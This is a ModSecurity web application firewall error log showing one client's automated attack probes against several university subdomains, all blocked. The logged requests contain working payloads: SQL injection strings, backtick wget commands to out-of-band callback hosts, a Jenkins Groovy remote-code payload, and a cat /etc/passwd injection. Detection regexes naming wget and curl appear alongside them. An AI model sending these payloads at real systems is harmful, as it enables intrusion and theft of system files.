[Tue Aug 29 11:32:59.359536 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARR24cAAAAF"]
[Tue Aug 29 11:32:59.377478 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARH7LQAAAAM"]
[Tue Aug 29 11:32:59.382795 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAPDoJwAAAAP"]
[Tue Aug 29 11:32:59.390801 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARNk7QAAAAS"]
[Tue Aug 29 11:32:59.396921 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAQMr4oAAAAu"]
[Tue Aug 29 11:32:59.436448 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARR24kAAAAF"]
[Tue Aug 29 11:32:59.716186 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgz3o1ntkh3dmb5.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARMMfIAAAAR"]
[Tue Aug 29 11:32:59.783998 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgugm9nfjab8q55.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARH7LoAAAAM"]
[Tue Aug 29 11:32:59.803346 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgxt5t98kxdcx83.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARQ34gAAAAB"]
[Tue Aug 29 11:32:59.804064 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgg1iqmnzcbjjza.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARH7LsAAAAM"]
[Tue Aug 29 11:32:59.805032 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgcpnz476hz5k14.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARR25AAAAAF"]
[Tue Aug 29 11:33:00.303186 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgz7p1o55zaz3mz.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10-MCo-f0AAAQMr40AAAAu"]
[Tue Aug 29 11:33:05.766901 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARMMfkAAAAR"]
[Tue Aug 29 11:33:05.767568 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARdiF8AAAAK"]
[Tue Aug 29 11:33:05.770370 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARQ35MAAAAB"]
[Tue Aug 29 11:33:05.783041 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARH7McAAAAM"]
[Tue Aug 29 11:33:05.787159 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAAQKOhgAAAAs"]
[Tue Aug 29 11:33:05.809382 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAAQMr5kAAAAu"]
[Tue Aug 29 11:33:09.404109 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAANsAbgAAAAD"]
[Tue Aug 29 11:33:09.405296 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARQ35UAAAAB"]
[Tue Aug 29 11:33:09.408003 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARYxCAAAAAJ"]
[Tue Aug 29 11:33:09.408003 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAAPDoKQAAAAP"]
[Tue Aug 29 11:33:09.408744 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARdiGIAAAAK"]
[Tue Aug 29 11:33:09.488706 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARR25oAAAAF"]
[Tue Aug 29 11:33:09.896518 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAARTELAAAAAG"]
[Tue Aug 29 11:33:09.912306 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAARR258AAAAF"]
[Tue Aug 29 11:33:10.347923 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARYxCcAAAAJ"]
[Tue Aug 29 11:33:10.352404 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARH7NMAAAAM"]
[Tue Aug 29 11:33:11.296193 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARYxCoAAAAJ"]
[Tue Aug 29 11:33:11.306857 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARTELUAAAAG"]
[Tue Aug 29 11:33:11.310426 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARQ36MAAAAB"]
[Tue Aug 29 11:33:11.315278 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARYxCsAAAAJ"]
[Tue Aug 29 11:33:11.316348 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARD1SkAAAAH"]
